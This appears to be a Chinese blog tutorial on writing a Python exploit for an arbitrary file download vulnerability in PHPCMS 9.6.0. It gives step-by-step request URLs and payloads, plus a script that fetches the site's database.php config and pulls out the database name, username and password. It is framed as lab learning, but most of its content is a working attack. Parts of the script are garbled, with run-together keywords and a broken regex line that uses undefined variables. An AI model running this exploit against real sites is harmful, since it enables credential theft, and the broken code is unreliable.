linux phpcms,PHPCMS任意文件下载之exp编写

于 2021-05-25 13:43:42 发布
阅读量185 收藏
点赞数
文章标签: linux phpcms

导读

学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp

实验工具:firefox,burp,phpcms9.6.0

实验语言:Python3.4

实验环境:php+mysql+apache

首先我们先来看看今天的phpcms任意文件下载漏洞复现步骤

这里可以建议大家去看下phpcms任意文件下载代码审计的思路流程。然后再来实际复现一遍。

漏洞复现流程就是按照我们下方的每一步链接走下去!

第一步

我们先来获取phpcms/modules/wap/index.php中的cookie值

http://127.0.0.1:9096/phpcms0/index.php?m=wap&c=index&a=init&siteid=1

1fab65d9d6586b9e244d6d92a77e039e.png

第二步

修改标红部分的文件即为自己想要下载的文件,这里标红部分就是你想要下载的内部文件。也就是在第二部构造我们的下载链接。对应的是构造的payload

http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%2%2*70

44a24bb2fffd366709064adc776d00df.png

第三步

访问该链接得到_att_json值

http://127.0.0.1:9096/phpcms0/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=&i=1&m=1&d=1&modelid=1&catid=1&s=./caches/configs/database.ph&f=p%3%252%2]index.ph... h&f=p%3%252%2*70C

eba6246a5a77cdbb5c479aafbb265107.png

第四步

通过获取到的_att_json值来构造下载payload

2b7e79bad12f39b86c1adfb769e443bb.png

第五步

通过增加json值认证去访问构造好的下载链接。将get请求中的a_k参数值替换成获取到的_att_json值,并且请求即可。这里后面的标红部分就是获取到的_att_json值

最后点击“点击下载”按钮,即可下载/caches/configs/database.php文件

499b84ce36132754ec00bf815ea601b3.png

90883c9323d680b987ca300eec6e1dbd.png

exp编写

漏洞复现流程走完之后我们就要来按照漏洞复现流程进行编写我们的exp:

#-*-coding=utf-8 -*-

#author = Free雅轩

importrequests

#导入requests模块,模拟爬取访问网页

importre

#导入re正则模块,对网页中我们所需的内容进行匹配

fromurllib.parse import quote

#从urllib.parse模块中导入quote方法,用于对传递进来的url进行编码re

TIMEOUT= 3

#设置网页响应超时时间为3秒

url= r'http://127.0.0.1:9096/phpcms9.0'

#定义URL地址

#这里其实是可以利用采集工具/模拟引擎来进行爬取PHPCMS的关键字来进行批量读取/验证操作

payload=r'&id=1&m=1&f=caches/configs/database.ph%3C&modelid=1&catid=1&s=&i=1&d=1&'

#定义漏洞利用payload

cookies= {}

#设置cookie

#步骤一 获取cookie

step1= '{}/index.php?m=wap&c=index&a=init&siteid=1/'.format(url)

print('step1:{}'.format(step1))

#模拟人工操作构造第一个payload

response1_cookies= requests.get(step1 , timeout=3).cookies

#将第一步的url和cookies结合并赋值给response_cookies,设置url响应超时时间为3秒

fori in response1_cookies:

print(i)

if i.name[-7:] == '_siteid':

cookies_head = i.name[:6]

cookies[cookies_head + '_userid' ] = i.value

cookies[i.name] = i.value

print(cookies)

#步骤二 获取_att_json

step2='{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}'.format(url, quote(payload))

print('step2:{}'.format(step2))

response2_cookies= requests.get(step2 , timeout=3 , cookies=cookies).cookies

forj in response2_cookies:

if j.name[-9:] == '_att_json':

enc_payload = j.value

#步骤三 获取构造下载链接

step3= '{}/index.php?m=content&c=down&a_k={}'.format(url,enc_payload)

print('step3:{}'.format(step3))

#步骤四 利用requests模块中的text方法将网页输出,将获取到的链接中的db,username,password等重要信息匹配出来

step4= requests.get(step3 , timeout=3 , cookies=cookies).text

file= re.findall(r''([\S]+)'"

re_username= r"'username' => '([\S]+)'"

re_password= r"'password' => '([\S]+)'"

db =re.search(re_db, ret).group(1)

username= re.search(re_username, ret).group(1)

password= re.search(re_password, ret).group(1)

print(db,username, password)

exp利用

d57585d3be28b2293c070004e710dba4.png

兔乱扔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4634
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
PhpCms系统设置:镜像下载模式 如何设置PhpCms镜像下载模式
09-29
这种模式允许用户在不直接存储所有文件于服务器的情况下,通过镜像服务来提供文件下载,从而减轻了服务器的压力,优化了资源管理。下面我们将深入探讨如何设置PHP CMS的镜像下载模式。 首先,我们要知道镜像下载...
phpcms文件下载的页面
weixin_44415928的博客
02-23 592
前边我们总结了单页面和新闻列表页的制作以及轮播图的制作,下面我们来说一个网站十分重要的内容,那就是下载页面。制作过程和前边的无异。我们新建一个栏目 我们选择添加栏目,选择下载模型 栏目列表页模板好选择,就是内容页不好搞啊,我们还要新建一个showDownload.html来作为下载页的模板 如下,catid就是下载栏目的ID,这里的{$v[fileurl]}和{$v[fielname]}表示的...
PHPCMS V9 任意文件下载(Windows)
aixuan9365的博客
05-20 322
先来看看PHPCMS V9.6.0的任意下载 还是和上次的注入一样,是个由parse_str() 函数引发的变量覆盖。 位于 /phpv9.6.0/phpcms/modules/content/down.php 的init() 函数 第11-82行 先是获取$a_k = trim($_GET['a_k']); 跟注入分析的时候一样就不多bb了, ...
phpcms down.php 漏洞,phpcms v9.6.1任意文件下载漏洞分析及EXP
weixin_32161697的博客
03-18 591
阅读:7,963之前PHPCMS V9.6.0被爆出来一波SQL注入个getshell的漏洞,官方修复了(典型的指哪修哪)并且发布了V9.6.1。但是并没有修复完全,又被搞出来一个任意文件下载的漏洞,此漏洞Payload同样可以绕过WAF检测。漏洞分析这个漏洞的套路跟之前的那个SQL注入漏洞一样。这次我们顺着来看这个漏洞产生的过程。漏洞触发点在文件/phpcms/modules/content/d...
PHPCMS任意文件下载exp编写
蚁景网安学院
07-02 235
前言学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp实验工具:firefox,burp,php...
PHPCMSv9.6.1任意文件读取漏洞的挖掘和分析过程
weixin_34187862的博客
05-03 1112
看到网上说出了这么一个漏洞,所以抽空分析了下,得出本篇分析。 1.准备工作&漏洞关键点快速扫描 1.1前置知识 这里把本次分析中需要掌握的知识梳理了下: php原生parse_str方法,会自动进行一次urldecode,第二个参数为空,则执行类似extract操作。 原生empty方法,对字符串""返回true。 phpcms...
python学习之phpcms exp编写
cxk
05-28 479
python学习之phpcms exp编写 针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import re import string import requests import random import time def getshell(host): try: ...
phpcmsv9.0任意文件上传漏洞解析
01-19
POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Fire...
PHPCMS资源网站源码软件源码下载站网站源码
09-26
在"PHPCMS资源网站源码软件源码下载站网站源码"中,我们可以理解为这是提供PHPCMS源码的下载平台,用于搭建一个专门发布和分享各种软件源码的下载站。这种网站通常会包含以下关键知识点: 1. **网站框架**:PHPCMS...
phpcmsv9单文件上传功能_UTF8_phpcmsv9单文件上传功能_UTF8_piledqq_源码
10-04
PHPcmsV9是一款基于PHP+MySQL开发的内容管理系统,它在网站建设和管理中提供了丰富的功能,其中单文件上传功能是其重要的组成部分之一。这一功能允许用户通过Web界面方便地上传各种类型的文件,如图片、文档等,为...
PHPcmsV9任意文件读取漏洞拿Shell
fengling132的专栏
08-02 1515
编辑:madman 日期:2012-07-29 分类:技术文章, 最新漏洞 评论:9条评论 简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解
phpcmsv9.15以下任意文件读取漏洞
weixin_33969116的博客
11-03 264
http://www.xx.com/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=..\/..\/caches/configs/database.php成功读取数据库信息如下:爆网站路径:http://www.xx.com/index.php?m=sear...
phpcms V9 getshell exp
收集盒 Book box
01-03 1112
转自法克 http://xx.f4ck.net/thread-5248-1-1.html #!usr/bin/php -w';$aspshell='eval request("'.$pass.'")%>'; if($js==1){ $file="1.asp;1.jpg"; $ret=GetShell ($url,$aspshell,$file);
phpcms0dayEXP_大众版
weixin_34096182的博客
04-01 110
phpcms0dayEXP_大众版
phpcms_v9.6.0_sql注入与exp
Fly_鹏程万里
12-23 1988
phpcms_v9.6.0_sql注入分析 可疑的函数 localhost/phpcms/modules/attachment/attachments.php文件的第241GET提交src变量带上了safe_relace函数,现在我们跟入这个该死的过滤函数看看它到底在搞什么鬼....*/ 2.过滤函数剖析和绕过 localhost/phpcms/libs/functions/g...
PHPCMS_V9注入0DAY___EXP已构造
weixin_33946605的博客
11-03 2754
PHPCMS_V9注入0DAY___EXP漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.htmlEXP构造:haxsscker土司只给了张烂图- -没给语句……那我就自己构造吧……本人构造结果如下:%60userid%60%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%2...
PHPCMS_v9.6.1_任意文件下载复现
xy_sugar的博客
03-23 1732
环境搭建 ①在phpstudy下进行环境的搭建 ②安装成功后用之前设置的管理员账号密码登陆后台 ③开启phpcms手机门户,然后退出管理后台 漏洞复现 ①访问该站点http://127.0.0.1/phpcmsfx/index.php?m=wap&c=index&a=init&siteid=1并且用firebug获取该网站的cook...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值